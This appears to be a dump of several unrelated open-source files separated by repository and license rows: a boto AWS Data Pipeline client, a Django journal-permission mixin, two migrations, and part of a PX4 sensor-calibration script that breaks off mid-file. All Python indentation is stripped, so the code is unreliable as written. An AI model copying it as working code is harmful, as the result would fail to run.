with the pipeline. Object definitions are composed of a set of
fields that define the properties of the object.
:type pipeline_id: string
:param pipeline_id: Identifier of the pipeline that contains the object
definitions.
:type object_ids: list
:param object_ids: Identifiers of the pipeline objects that contain the
definitions to be described. You can pass as many as 25 identifiers
in a single call to DescribeObjects.
:type evaluate_expressions: boolean
:param evaluate_expressions: Indicates whether any expressions in the
object should be evaluated when the object descriptions are
returned.
:type marker: string
:param marker: The starting point for the results to be returned. The
first time you call DescribeObjects, this value should be empty. As
long as the action returns `HasMoreResults` as `True`, you can call
DescribeObjects again and pass the marker value from the response
to retrieve the next set of results.
"""
params = {
'pipelineId': pipeline_id,
'objectIds': object_ids,
}
if evaluate_expressions is not None:
params['evaluateExpressions'] = evaluate_expressions
if marker is not None:
params['marker'] = marker
return self.make_request(action='DescribeObjects',
body=json.dumps(params))
def describe_pipelines(self, pipeline_ids):
"""
Retrieve metadata about one or more pipelines. The information
retrieved includes the name of the pipeline, the pipeline
identifier, its current state, and the user account that owns
the pipeline. Using account credentials, you can retrieve
metadata about pipelines that you or your IAM users have
created. If you are using an IAM user account, you can
retrieve metadata about only those pipelines you have read
permission for.
To retrieve the full pipeline definition instead of metadata
about the pipeline, call the GetPipelineDefinition action.
:type pipeline_ids: list
:param pipeline_ids: Identifiers of the pipelines to describe. You can
pass as many as 25 identifiers in a single call to
DescribePipelines. You can obtain pipeline identifiers by calling
ListPipelines.
"""
params = {'pipelineIds': pipeline_ids, }
return self.make_request(action='DescribePipelines',
body=json.dumps(params))
def evaluate_expression(self, pipeline_id, expression, object_id):
"""
Evaluates a string in the context of a specified object. A
task runner can use this action to evaluate SQL queries stored
in Amazon S3.
:type pipeline_id: string
:param pipeline_id: The identifier of the pipeline.
:type object_id: string
:param object_id: The identifier of the object.
:type expression: string
:param expression: The expression to evaluate.
"""
params = {
'pipelineId': pipeline_id,
'objectId': object_id,
'expression': expression,
}
return self.make_request(action='EvaluateExpression',
body=json.dumps(params))
def get_pipeline_definition(self, pipeline_id, version=None):
"""
Returns the definition of the specified pipeline. You can call
GetPipelineDefinition to retrieve the pipeline definition you
provided using PutPipelineDefinition.
:type pipeline_id: string
:param pipeline_id: The identifier of the pipeline.
:type version: string
:param version: The version of the pipeline definition to retrieve.
This parameter accepts the values `latest` (default) and `active`.
Where `latest` indicates the last definition saved to the pipeline
and `active` indicates the last definition of the pipeline that was
activated.
"""
params = {'pipelineId': pipeline_id, }
if version is not None:
params['version'] = version
return self.make_request(action='GetPipelineDefinition',
body=json.dumps(params))
def list_pipelines(self, marker=None):
"""
Returns a list of pipeline identifiers for all active
pipelines. Identifiers are returned only for pipelines you
have permission to access.
:type marker: string
:param marker: The starting point for the results to be returned. The
first time you call ListPipelines, this value should be empty. As
long as the action returns `HasMoreResults` as `True`, you can call
ListPipelines again and pass the marker value from the response to
retrieve the next set of results.
"""
params = {}
if marker is not None:
params['marker'] = marker
return self.make_request(action='ListPipelines',
body=json.dumps(params))
def poll_for_task(self, worker_group, hostname=None,
instance_identity=None):
"""
Task runners call this action to receive a task to perform
from AWS Data Pipeline. The task runner specifies which tasks
it can perform by setting a value for the workerGroup
parameter of the PollForTask call. The task returned by
PollForTask may come from any of the pipelines that match the
workerGroup value passed in by the task runner and that was
launched using the IAM user credentials specified by the task
runner.
If tasks are ready in the work queue, PollForTask returns a
response immediately. If no tasks are available in the queue,
PollForTask uses long-polling and holds on to a poll
connection for up to a 90 seconds during which time the first
newly scheduled task is handed to the task runner. To
accomodate this, set the socket timeout in your task runner to
90 seconds. The task runner should not call PollForTask again
on the same `workerGroup` until it receives a response, and
this may take up to 90 seconds.
:type worker_group: string
:param worker_group: Indicates the type of task the task runner is
configured to accept and process. The worker group is set as a
field on objects in the pipeline when they are created. You can
only specify a single value for `workerGroup` in the call to
PollForTask. There are no wildcard values permitted in
`workerGroup`, the string must be an exact, case-sensitive, match.
:type hostname: string
:param hostname: The public DNS name of the calling task runner.
:type instance_identity: dict
:param instance_identity: Identity information for the Amazon EC2
instance that is hosting the task runner. You can get this value by
calling the URI, `http://169.254.169.254/latest/meta-data/instance-
id`, from the EC2 instance. For more information, go to `Instance
Metadata`_ in the Amazon Elastic Compute Cloud User Guide. Passing
in this value proves that your task runner is running on an EC2
instance, and ensures the proper AWS Data Pipeline service charges
are applied to your pipeline.
"""
params = {'workerGroup': worker_group, }
if hostname is not None:
params['hostname'] = hostname
if instance_identity is not None:
params['instanceIdentity'] = instance_identity
return self.make_request(action='PollForTask',
body=json.dumps(params))
def put_pipeline_definition(self, pipeline_objects, pipeline_id):
"""
Adds tasks, schedules, and preconditions that control the
behavior of the pipeline. You can use PutPipelineDefinition to
populate a new pipeline or to update an existing pipeline that
has not yet been activated.
PutPipelineDefinition also validates the configuration as it
adds it to the pipeline. Changes to the pipeline are saved
unless one of the following three validation errors exists in
the pipeline.
#. An object is missing a name or identifier field.
#. A string or reference field is empty.
#. The number of objects in the pipeline exceeds the maximum
allowed objects.
Pipeline object definitions are passed to the
PutPipelineDefinition action and returned by the
GetPipelineDefinition action.
:type pipeline_id: string
:param pipeline_id: The identifier of the pipeline to be configured.
:type pipeline_objects: list
:param pipeline_objects: The objects that define the pipeline. These
will overwrite the existing pipeline definition.
"""
params = {
'pipelineId': pipeline_id,
'pipelineObjects': pipeline_objects,
}
return self.make_request(action='PutPipelineDefinition',
body=json.dumps(params))
def query_objects(self, pipeline_id, sphere, marker=None, query=None,
limit=None):
"""
Queries a pipeline for the names of objects that match a
specified set of conditions.
The objects returned by QueryObjects are paginated and then
filtered by the value you set for query. This means the action
may return an empty result set with a value set for marker. If
`HasMoreResults` is set to `True`, you should continue to call
QueryObjects, passing in the returned value for marker, until
`HasMoreResults` returns `False`.
:type pipeline_id: string
:param pipeline_id: Identifier of the pipeline to be queried for object
names.
:type query: dict
:param query: Query that defines the objects to be returned. The Query
object can contain a maximum of ten selectors. The conditions in
the query are limited to top-level String fields in the object.
These filters can be applied to components, instances, and
attempts.
:type sphere: string
:param sphere: Specifies whether the query applies to components or
instances. Allowable values: `COMPONENT`, `INSTANCE`, `ATTEMPT`.
:type marker: string
:param marker: The starting point for the results to be returned. The
first time you call QueryObjects, this value should be empty. As
long as the action returns `HasMoreResults` as `True`, you can call
QueryObjects again and pass the marker value from the response to
retrieve the next set of results.
:type limit: integer
:param limit: Specifies the maximum number of object names that
QueryObjects will return in a single call. The default value is
100.
"""
params = {'pipelineId': pipeline_id, 'sphere': sphere, }
if query is not None:
params['query'] = query
if marker is not None:
params['marker'] = marker
if limit is not None:
params['limit'] = limit
return self.make_request(action='QueryObjects',
body=json.dumps(params))
def report_task_progress(self, task_id):
"""
Updates the AWS Data Pipeline service on the progress of the
calling task runner. When the task runner is assigned a task,
it should call ReportTaskProgress to acknowledge that it has
the task within 2 minutes. If the web service does not recieve
this acknowledgement within the 2 minute window, it will
assign the task in a subsequent PollForTask call. After this
initial acknowledgement, the task runner only needs to report
progress every 15 minutes to maintain its ownership of the
task. You can change this reporting time from 15 minutes by
specifying a `reportProgressTimeout` field in your pipeline.
If a task runner does not report its status after 5 minutes,
AWS Data Pipeline will assume that the task runner is unable
to process the task and will reassign the task in a subsequent
response to PollForTask. task runners should call
ReportTaskProgress every 60 seconds.
:type task_id: string
:param task_id: Identifier of the task assigned to the task runner.
This value is provided in the TaskObject that the service returns
with the response for the PollForTask action.
"""
params = {'taskId': task_id, }
return self.make_request(action='ReportTaskProgress',
body=json.dumps(params))
def report_task_runner_heartbeat(self, taskrunner_id, worker_group=None,
hostname=None):
"""
Task runners call ReportTaskRunnerHeartbeat every 15 minutes
to indicate that they are operational. In the case of AWS Data
Pipeline Task Runner launched on a resource managed by AWS
Data Pipeline, the web service can use this call to detect
when the task runner application has failed and restart a new
instance.
:type taskrunner_id: string
:param taskrunner_id: The identifier of the task runner. This value
should be unique across your AWS account. In the case of AWS Data
Pipeline Task Runner launched on a resource managed by AWS Data
Pipeline, the web service provides a unique identifier when it
launches the application. If you have written a custom task runner,
you should assign a unique identifier for the task runner.
:type worker_group: string
:param worker_group: Indicates the type of task the task runner is
configured to accept and process. The worker group is set as a
field on objects in the pipeline when they are created. You can
only specify a single value for `workerGroup` in the call to
ReportTaskRunnerHeartbeat. There are no wildcard values permitted
in `workerGroup`, the string must be an exact, case-sensitive,
match.
:type hostname: string
:param hostname: The public DNS name of the calling task runner.
"""
params = {'taskrunnerId': taskrunner_id, }
if worker_group is not None:
params['workerGroup'] = worker_group
if hostname is not None:
params['hostname'] = hostname
return self.make_request(action='ReportTaskRunnerHeartbeat',
body=json.dumps(params))
def set_status(self, object_ids, status, pipeline_id):
"""
Requests that the status of an array of physical or logical
pipeline objects be updated in the pipeline. This update may
not occur immediately, but is eventually consistent. The
status that can be set depends on the type of object.
:type pipeline_id: string
:param pipeline_id: Identifies the pipeline that contains the objects.
:type object_ids: list
:param object_ids: Identifies an array of objects. The corresponding
objects can be either physical or components, but not a mix of both
types.
:type status: string
:param status: Specifies the status to be set on all the objects in
`objectIds`. For components, this can be either `PAUSE` or
`RESUME`. For instances, this can be either `CANCEL`, `RERUN`, or
`MARK_FINISHED`.
"""
params = {
'pipelineId': pipeline_id,
'objectIds': object_ids,
'status': status,
}
return self.make_request(action='SetStatus',
body=json.dumps(params))
def set_task_status(self, task_id, task_status, error_id=None,
error_message=None, error_stack_trace=None):
"""
Notifies AWS Data Pipeline that a task is completed and
provides information about the final status. The task runner
calls this action regardless of whether the task was
sucessful. The task runner does not need to call SetTaskStatus
for tasks that are canceled by the web service during a call
to ReportTaskProgress.
:type task_id: string
:param task_id: Identifies the task assigned to the task runner. This
value is set in the TaskObject that is returned by the PollForTask
action.
:type task_status: string
:param task_status: If `FINISHED`, the task successfully completed. If
`FAILED` the task ended unsuccessfully. The `FALSE` value is used
by preconditions.
:type error_id: string
:param error_id: If an error occurred during the task, this value
specifies an id value that represents the error. This value is set
on the physical attempt object. It is used to display error
information to the user. It should not start with string "Service_"
which is reserved by the system.
:type error_message: string
:param error_message: If an error occurred during the task, this value
specifies a text description of the error. This value is set on the
physical attempt object. It is used to display error information to
the user. The web service does not parse this value.
:type error_stack_trace: string
:param error_stack_trace: If an error occurred during the task, this
value specifies the stack trace associated with the error. This
value is set on the physical attempt object. It is used to display
error information to the user. The web service does not parse this
value.
"""
params = {'taskId': task_id, 'taskStatus': task_status, }
if error_id is not None:
params['errorId'] = error_id
if error_message is not None:
params['errorMessage'] = error_message
if error_stack_trace is not None:
params['errorStackTrace'] = error_stack_trace
return self.make_request(action='SetTaskStatus',
body=json.dumps(params))
def validate_pipeline_definition(self, pipeline_objects, pipeline_id):
"""
Tests the pipeline definition with a set of validation checks
to ensure that it is well formed and can run without error.
:type pipeline_id: string
:param pipeline_id: Identifies the pipeline whose definition is to be
validated.
:type pipeline_objects: list
:param pipeline_objects: A list of objects that define the pipeline
changes to validate against the pipeline.
"""
params = {
'pipelineId': pipeline_id,
'pipelineObjects': pipeline_objects,
}
return self.make_request(action='ValidatePipelineDefinition',
body=json.dumps(params))
def make_request(self, action, body):
headers = {
'X-Amz-Target': '%s.%s' % (self.TargetPrefix, action),
'Host': self.region.endpoint,
'Content-Type': 'application/x-amz-json-1.1',
'Content-Length': str(len(body)),
}
http_request = self.build_base_http_request(
method='POST', path='/', auth_path='/', params={},
headers=headers, data=body)
response = self._mexe(http_request, sender=None,
override_num_retries=10)
response_body = response.read().decode('utf-8')
boto.log.debug(response_body)
if response.status == 200:
if response_body:
return json.loads(response_body)
else:
json_body = json.loads(response_body)
fault_name = json_body.get('__type', None)
exception_class = self._faults.get(fault_name, self.ResponseError)
raise exception_class(response.status, response.reason,
body=json_body)
| gpl-3.0 |
erudit/zenon | eruditorg/apps/userspace/journal/viewmixins.py | 1 | 4026 | # -*- coding: utf-8 -*-
from django.core.exceptions import PermissionDenied
from django.urls import reverse
from django.http import HttpResponseRedirect
from django.shortcuts import get_object_or_404
from django.utils.functional import cached_property
from django.contrib.auth.mixins import LoginRequiredMixin
from rules.contrib.views import PermissionRequiredMixin
from core.journal.rules_helpers import get_editable_journals
from erudit.models import Journal
class JournalScopeMixin:
"""
The JournalScopeMixin provides a way to associate a view with a specific Journal instance. The
Journal instance must have the current user in its members. If not a PermissionDenied error will
be returned.
"""
force_scope_switch_to_pattern_name = None
scope_session_key = 'userspace:journal-management:current-journal-id'
def dispatch(self, request, *args, **kwargs):
self.request = request
response = self.init_scope()
return response if response \
else super(JournalScopeMixin, self).dispatch(request, *args, **kwargs)
def get_context_data(self, **kwargs):
context = super(JournalScopeMixin, self).get_context_data(**kwargs)
context['scope_current_journal'] = self.current_journal
context['scope_user_journals'] = self.user_journals
context['force_scope_switch_to_pattern_name'] = self.force_scope_switch_to_pattern_name
return context
def get_user_journals(self):
""" Returns the journals that can be accessed by the current user. """
return get_editable_journals(self.request.user)
def init_current_journal(self, journal):
""" Associates the current journal to the view and saves its ID into the session. """
self.current_journal = journal
self.request.session[self.scope_session_key] = journal.id
def init_scope(self):
""" Initializes the Journal scope. """
scoped_url = self.kwargs.get('journal_pk') is not None
# We try to determine the current Journal instance by looking
# first in the URL. If the journal ID cannot be retrieved from there
# we try to fetch it from the session.
current_journal_id = self.kwargs.get('journal_pk', None) \
or self.request.session.get(self.scope_session_key, None)
journal = None
if current_journal_id is not None:
journal = get_object_or_404(Journal, id=current_journal_id)
else:
user_journals_qs = self.user_journals
user_journal_count = user_journals_qs.count()
if user_journal_count:
journal = user_journals_qs.first()
# Returns a 403 error if the user is not a member of the journal
if journal is None or not self.user_journals.filter(id=journal.id).exists():
raise PermissionDenied
if not scoped_url:
# Redirects to the scoped URL
resolver_match = self.request.resolver_match
args = resolver_match.args
kwargs = resolver_match.kwargs.copy()
kwargs.update({'journal_pk': journal.pk})
url = reverse(
':'.join([resolver_match.namespace, resolver_match.url_name]),
args=args, kwargs=kwargs)
if self.request.GET:
url = '{}?{}'.format(url, self.request.GET.urlencode())
return HttpResponseRedirect(url)
self.init_current_journal(journal)
@cached_property
def user_journals(self):
return self.get_user_journals()
class JournalScopePermissionRequiredMixin(
LoginRequiredMixin, JournalScopeMixin, PermissionRequiredMixin):
raise_exception = True
def get_context_data(self, **kwargs):
context = super(JournalScopePermissionRequiredMixin, self).get_context_data(**kwargs)
context['journal_permission_required'] = self.permission_required
return context
def get_permission_object(self):
return self.current_journal
| gpl-3.0 |
lamby/buildinfo.debian.net | bidb/buildinfo/buildinfo_submissions/migrations/0001_initial.py | 1 | 1336 | # -*- coding: utf-8 -*-
# Generated by Django 1.10.2 on 2016-10-22 13:37
from __future__ import unicode_literals
import datetime
from django.db import migrations, models
import django.db.models.deletion
import django.utils.crypto
import functools
class Migration(migrations.Migration):
initial = True
dependencies = [
('buildinfo', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Submission',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('slug', models.CharField(default=functools.partial(django.utils.crypto.get_random_string, *(8, b'3479abcdefghijkmnopqrstuvwxyz'), **{}), max_length=8, unique=True)),
('uid', models.CharField(max_length=512)),
('node', models.CharField(max_length=512)),
('raw_text', models.TextField()),
('created', models.DateTimeField(default=datetime.datetime.utcnow)),
('buildinfo', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='submissions', to='buildinfo.Buildinfo')),
],
options={
'ordering': ('created',),
'get_latest_by': 'created',
},
),
]
| agpl-3.0 |
achow101/forkmon | monitor/migrations/0005_auto_20170718_2122.py | 1 | 1037 | # -*- coding: utf-8 -*-
# Generated by Django 1.11.1 on 2017-07-19 04:22
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('monitor', '0004_auto_20170718_0105'),
]
operations = [
migrations.CreateModel(
name='BIP9Fork',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100)),
('state', models.CharField(max_length=100)),
('count', models.IntegerField()),
('elapsed', models.IntegerField()),
('period', models.IntegerField()),
('threshold', models.IntegerField()),
],
),
migrations.AddField(
model_name='node',
name='stats_node',
field=models.BooleanField(default=False),
),
]
| mit |
jlecoeur/Firmware | Tools/process_sensor_caldata.py | 2 | 31623 | #! /usr/bin/env python
from __future__ import print_function
import argparse
import os
import matplotlib.pyplot as plt
import numpy as np
from pyulog import *
"""
Reads in IMU data from a static thermal calibration test and performs a curve fit of gyro, accel and baro bias vs temperature
Data can be gathered using the following sequence:
1) Power up the board and set the TC_A_ENABLE, TC_B_ENABLE and TC_G_ENABLE parameters to 1
2) Set all CAL_GYR and CAL_ACC parameters to defaults
3) Set the SYS_LOGGER parameter to 1 to use the new system logger
4) Set the SDLOG_MODE parameter to 2, and SDLOG_PROFILE parameter to 4 to enable logging of sensor data for calibration and power off
5) Cold soak the board for 30 minutes
6) Move to a warm dry, still air, constant pressure environment.
7) Apply power for 45 minutes, keeping the board still.
8) Remove power and extract the .ulog file
9) Open a terminal window in the Firmware/Tools directory and run the python calibration script script file: 'python process_sensor_caldata.py <full path name to .ulog file>
10) Power the board, connect QGC and load the parameter from the generated .params file onto the board using QGC. Due to the number of parameters, loading them may take some time.
11) TODO - we need a way for user to reliably tell when parameters have all been changed and saved.
12) After parameters have finished loading, set SDLOG_MODE and SDLOG_PROFILE to their respective values prior to step 4) and remove power.
13) Power the board and perform a normal gyro and accelerometer sensor calibration using QGC. The board must be repowered after this step before flying due to large parameter changes and the thermal compensation parameters only being read on startup.
Outputs thermal compensation parameters in a file named <inputfilename>.params which can be loaded onto the board using QGroundControl
Outputs summary plots in a pdf file named <inputfilename>.pdf
"""
parser = argparse.ArgumentParser(description='Analyse the sensor_gyro message data')
parser.add_argument('filename', metavar='file.ulg', help='ULog input file')
def is_valid_directory(parser, arg):
if os.path.isdir(arg):
# Directory exists so return the directory
return arg
else:
parser.error('The directory {} does not exist'.format(arg))
args = parser.parse_args()
ulog_file_name = args.filename
ulog = ULog(ulog_file_name, None)
data = ulog.data_list
# extract gyro data
sensor_instance = 0
num_gyros = 0
for d in data:
if d.name == 'sensor_gyro':
if sensor_instance == 0:
sensor_gyro_0 = d.data
print('found gyro 0 data')
num_gyros = 1
if sensor_instance == 1:
sensor_gyro_1 = d.data
print('found gyro 1 data')
num_gyros = 2
if sensor_instance == 2:
sensor_gyro_2 = d.data
print('found gyro 2 data')
num_gyros = 3
sensor_instance = sensor_instance +1
# extract accel data
sensor_instance = 0
num_accels = 0
for d in data:
if d.name == 'sensor_accel':
if sensor_instance == 0:
sensor_accel_0 = d.data
print('found accel 0 data')
num_accels = 1
if sensor_instance == 1:
sensor_accel_1 = d.data
print('found accel 1 data')
num_accels = 2
if sensor_instance == 2:
sensor_accel_2 = d.data
print('found accel 2 data')
num_accels = 3
sensor_instance = sensor_instance +1
# extract baro data
sensor_instance = 0
num_baros = 0
for d in data:
if d.name == 'sensor_baro':
if sensor_instance == 0:
sensor_baro_0 = d.data
print('found baro 0 data')
num_baros = 1
if sensor_instance == 1:
sensor_baro_1 = d.data
print('found baro 1 data')
num_baros = 2
sensor_instance = sensor_instance +1
# open file to save plots to PDF
from matplotlib.backends.backend_pdf import PdfPages
output_plot_filename = ulog_file_name + ".pdf"
pp = PdfPages(output_plot_filename)
#################################################################################
# define data dictionary of gyro 0 thermal correction parameters
gyro_0_params = {
'TC_G0_ID':0,
'TC_G0_TMIN':0.0,
'TC_G0_TMAX':0.0,
'TC_G0_TREF':0.0,
'TC_G0_X0_0':0.0,
'TC_G0_X1_0':0.0,
'TC_G0_X2_0':0.0,
'TC_G0_X3_0':0.0,
'TC_G0_X0_1':0.0,
'TC_G0_X1_1':0.0,
'TC_G0_X2_1':0.0,
'TC_G0_X3_1':0.0,
'TC_G0_X0_2':0.0,
'TC_G0_X1_2':0.0,
'TC_G0_X2_2':0.0,
'TC_G0_X3_2':0.0,
'TC_G0_SCL_0':1.0,
'TC_G0_SCL_1':1.0,
'TC_G0_SCL_2':1.0
}
# curve fit the data for gyro 0 corrections
if num_gyros >= 1:
gyro_0_params['TC_G0_ID'] = int(np.median(sensor_gyro_0['device_id']))
# find the min, max and reference temperature
gyro_0_params['TC_G0_TMIN'] = np.amin(sensor_gyro_0['temperature'])
gyro_0_params['TC_G0_TMAX'] = np.amax(sensor_gyro_0['temperature'])
gyro_0_params['TC_G0_TREF'] = 0.5 * (gyro_0_params['TC_G0_TMIN'] + gyro_0_params['TC_G0_TMAX'])
temp_rel = sensor_gyro_0['temperature'] - gyro_0_params['TC_G0_TREF']
temp_rel_resample = np.linspace(gyro_0_params['TC_G0_TMIN']-gyro_0_params['TC_G0_TREF'], gyro_0_params['TC_G0_TMAX']-gyro_0_params['TC_G0_TREF'], 100)
temp_resample = temp_rel_resample + gyro_0_params['TC_G0_TREF']
# fit X axis
coef_gyro_0_x = np.polyfit(temp_rel,sensor_gyro_0['x'],3)
gyro_0_params['TC_G0_X3_0'] = coef_gyro_0_x[0]
gyro_0_params['TC_G0_X2_0'] = coef_gyro_0_x[1]
gyro_0_params['TC_G0_X1_0'] = coef_gyro_0_x[2]
gyro_0_params['TC_G0_X0_0'] = coef_gyro_0_x[3]
fit_coef_gyro_0_x = np.poly1d(coef_gyro_0_x)
gyro_0_x_resample = fit_coef_gyro_0_x(temp_rel_resample)
# fit Y axis
coef_gyro_0_y = np.polyfit(temp_rel,sensor_gyro_0['y'],3)
gyro_0_params['TC_G0_X3_1'] = coef_gyro_0_y[0]
gyro_0_params['TC_G0_X2_1'] = coef_gyro_0_y[1]
gyro_0_params['TC_G0_X1_1'] = coef_gyro_0_y[2]
gyro_0_params['TC_G0_X0_1'] = coef_gyro_0_y[3]
fit_coef_gyro_0_y = np.poly1d(coef_gyro_0_y)
gyro_0_y_resample = fit_coef_gyro_0_y(temp_rel_resample)
# fit Z axis
coef_gyro_0_z = np.polyfit(temp_rel,sensor_gyro_0['z'],3)
gyro_0_params['TC_G0_X3_2'] = coef_gyro_0_z[0]
gyro_0_params['TC_G0_X2_2'] = coef_gyro_0_z[1]
gyro_0_params['TC_G0_X1_2'] = coef_gyro_0_z[2]
gyro_0_params['TC_G0_X0_2'] = coef_gyro_0_z[3]
fit_coef_gyro_0_z = np.poly1d(coef_gyro_0_z)
gyro_0_z_resample = fit_coef_gyro_0_z(temp_rel_resample)
# gyro0 vs temperature
plt.figure(1,figsize=(20,13))
# draw plots
plt.subplot(3,1,1)
plt.plot(sensor_gyro_0['temperature'],sensor_gyro_0['x'],'b')
plt.plot(temp_resample,gyro_0_x_resample,'r')
plt.title('Gyro 0 Bias vs Temperature')
plt.ylabel('X bias (rad/s)')
plt.xlabel('temperature (degC)')
plt.grid()
# draw plots
plt.subplot(3,1,2)
plt.plot(sensor_gyro_0['temperature'],sensor_gyro_0['y'],'b')
plt.plot(temp_resample,gyro_0_y_resample,'r')
plt.ylabel('Y bias (rad/s)')
plt.xlabel('temperature (degC)')
plt.grid()
# draw plots
plt.subplot(3,1,3)
plt.plot(sensor_gyro_0['temperature'],sensor_gyro_0['z'],'b')
plt.plot(temp_resample,gyro_0_z_resample,'r')
plt.ylabel('Z bias (rad/s)')
plt.xlabel('temperature (degC)')
plt.grid()
pp.savefig()
#################################################################################
#################################################################################
# define data dictionary of gyro 1 thermal correction parameters
gyro_1_params = {
'TC_G1_ID':0,
'TC_G1_TMIN':0.0,
'TC_G1_TMAX':0.0,
'TC_G1_TREF':0.0,
'TC_G1_X0_0':0.0,
'TC_G1_X1_0':0.0,
'TC_G1_X2_0':0.0,
'TC_G1_X3_0':0.0,
'TC_G1_X0_1':0.0,
'TC_G1_X1_1':0.0,
'TC_G1_X2_1':0.0,
'TC_G1_X3_1':0.0,
'TC_G1_X0_2':0.0,
'TC_G1_X1_2':0.0,
'TC_G1_X2_2':0.0,
'TC_G1_X3_2':0.0,
'TC_G1_SCL_0':1.0,
'TC_G1_SCL_1':1.0,
'TC_G1_SCL_2':1.0
}
# curve fit the data for gyro 1 corrections
if num_gyros >= 2:
gyro_1_params['TC_G1_ID'] = int(np.median(sensor_gyro_1['device_id']))
# find the min, max and reference temperature
gyro_1_params['TC_G1_TMIN'] = np.amin(sensor_gyro_1['temperature'])
gyro_1_params['TC_G1_TMAX'] = np.amax(sensor_gyro_1['temperature'])
gyro_1_params['TC_G1_TREF'] = 0.5 * (gyro_1_params['TC_G1_TMIN'] + gyro_1_params['TC_G1_TMAX'])
temp_rel = sensor_gyro_1['temperature'] - gyro_1_params['TC_G1_TREF']
temp_rel_resample = np.linspace(gyro_1_params['TC_G1_TMIN']-gyro_1_params['TC_G1_TREF'], gyro_1_params['TC_G1_TMAX']-gyro_1_params['TC_G1_TREF'], 100)
temp_resample = temp_rel_resample + gyro_1_params['TC_G1_TREF']
# fit X axis
coef_gyro_1_x = np.polyfit(temp_rel,sensor_gyro_1['x'],3)
gyro_1_params['TC_G1_X3_0'] = coef_gyro_1_x[0]
gyro_1_params['TC_G1_X2_0'] = coef_gyro_1_x[1]
gyro_1_params['TC_G1_X1_0'] = coef_gyro_1_x[2]
gyro_1_params['TC_G1_X0_0'] = coef_gyro_1_x[3]
fit_coef_gyro_1_x = np.poly1d(coef_gyro_1_x)
gyro_1_x_resample = fit_coef_gyro_1_x(temp_rel_resample)
# fit Y axis
coef_gyro_1_y = np.polyfit(temp_rel,sensor_gyro_1['y'],3)
gyro_1_params['TC_G1_X3_1'] = coef_gyro_1_y[0]
gyro_1_params['TC_G1_X2_1'] = coef_gyro_1_y[1]
gyro_1_params['TC_G1_X1_1'] = coef_gyro_1_y[2]
gyro_1_params['TC_G1_X0_1'] = coef_gyro_1_y[3]
fit_coef_gyro_1_y = np.poly1d(coef_gyro_1_y)
gyro_1_y_resample = fit_coef_gyro_1_y(temp_rel_resample)
# fit Z axis
coef_gyro_1_z = np.polyfit(temp_rel,sensor_gyro_1['z'],3)
gyro_1_params['TC_G1_X3_2'] = coef_gyro_1_z[0]
gyro_1_params['TC_G1_X2_2'] = coef_gyro_1_z[1]
gyro_1_params['TC_G1_X1_2'] = coef_gyro_1_z[2]
gyro_1_params['TC_G1_X0_2'] = coef_gyro_1_z[3]
fit_coef_gyro_1_z = np.poly1d(coef_gyro_1_z)
gyro_1_z_resample = fit_coef_gyro_1_z(temp_rel_resample)
# gyro1 vs temperature
plt.figure(2,figsize=(20,13))
# draw plots
plt.subplot(3,1,1)
plt.plot(sensor_gyro_1['temperature'],sensor_gyro_1['x'],'b')
plt.plot(temp_resample,gyro_1_x_resample,'r')
plt.title('Gyro 1 Bias vs Temperature')
plt.ylabel('X bias (rad/s)')
plt.xlabel('temperature (degC)')
plt.grid()
# draw plots
plt.subplot(3,1,2)
plt.plot(sensor_gyro_1['temperature'],sensor_gyro_1['y'],'b')
plt.plot(temp_resample,gyro_1_y_resample,'r')
plt.ylabel('Y bias (rad/s)')
plt.xlabel('temperature (degC)')
plt.grid()
# draw plots
plt.subplot(3,1,3)
plt.plot(sensor_gyro_1['temperature'],sensor_gyro_1['z'],'b')
plt.plot(temp_resample,gyro_1_z_resample,'r')
plt.ylabel('Z bias (rad/s)')
plt.xlabel('temperature (degC)')
plt.grid()
pp.savefig()
#################################################################################
#################################################################################
# define data dictionary of gyro 2 thermal correction parameters
gyro_2_params = {
'TC_G2_ID':0,
'TC_G2_TMIN':0.0,
'TC_G2_TMAX':0.0,
'TC_G2_TREF':0.0,
'TC_G2_X0_0':0.0,
'TC_G2_X1_0':0.0,
'TC_G2_X2_0':0.0,
'TC_G2_X3_0':0.0,
'TC_G2_X0_1':0.0,
'TC_G2_X1_1':0.0,
'TC_G2_X2_1':0.0,
'TC_G2_X3_1':0.0,
'TC_G2_X0_2':0.0,
'TC_G2_X1_2':0.0,
'TC_G2_X2_2':0.0,
'TC_G2_X3_2':0.0,
'TC_G2_SCL_0':1.0,
'TC_G2_SCL_1':1.0,
'TC_G2_SCL_2':1.0
}
# curve fit the data for gyro 2 corrections
if num_gyros >= 3:
gyro_2_params['TC_G2_ID'] = int(np.median(sensor_gyro_2['device_id']))
# find the min, max and reference temperature
gyro_2_params['TC_G2_TMIN'] = np.amin(sensor_gyro_2['temperature'])
gyro_2_params['TC_G2_TMAX'] = np.amax(sensor_gyro_2['temperature'])
gyro_2_params['TC_G2_TREF'] = 0.5 * (gyro_2_params['TC_G2_TMIN'] + gyro_2_params['TC_G2_TMAX'])
temp_rel = sensor_gyro_2['temperature'] - gyro_2_params['TC_G2_TREF']
temp_rel_resample = np.linspace(gyro_2_params['TC_G2_TMIN']-gyro_2_params['TC_G2_TREF'], gyro_2_params['TC_G2_TMAX']-gyro_2_params['TC_G2_TREF'], 100)
temp_resample = temp_rel_resample + gyro_2_params['TC_G2_TREF']
# fit X axis
coef_gyro_2_x = np.polyfit(temp_rel,sensor_gyro_2['x'],3)
gyro_2_params['TC_G2_X3_0'] = coef_gyro_2_x[0]
gyro_2_params['TC_G2_X2_0'] = coef_gyro_2_x[1]
gyro_2_params['TC_G2_X1_0'] = coef_gyro_2_x[2]
gyro_2_params['TC_G2_X0_0'] = coef_gyro_2_x[3]
fit_coef_gyro_2_x = np.poly1d(coef_gyro_2_x)
gyro_2_x_resample = fit_coef_gyro_2_x(temp_rel_resample)
# fit Y axis
coef_gyro_2_y = np.polyfit(temp_rel,sensor_gyro_2['y'],3)
gyro_2_params['TC_G2_X3_1'] = coef_gyro_2_y[0]
gyro_2_params['TC_G2_X2_1'] = coef_gyro_2_y[1]
gyro_2_params['TC_G2_X1_1'] = coef_gyro_2_y[2]
gyro_2_params['TC_G2_X0_1'] = coef_gyro_2_y[3]
fit_coef_gyro_2_y = np.poly1d(coef_gyro_2_y)
gyro_2_y_resample = fit_coef_gyro_2_y(temp_rel_resample)
# fit Z axis
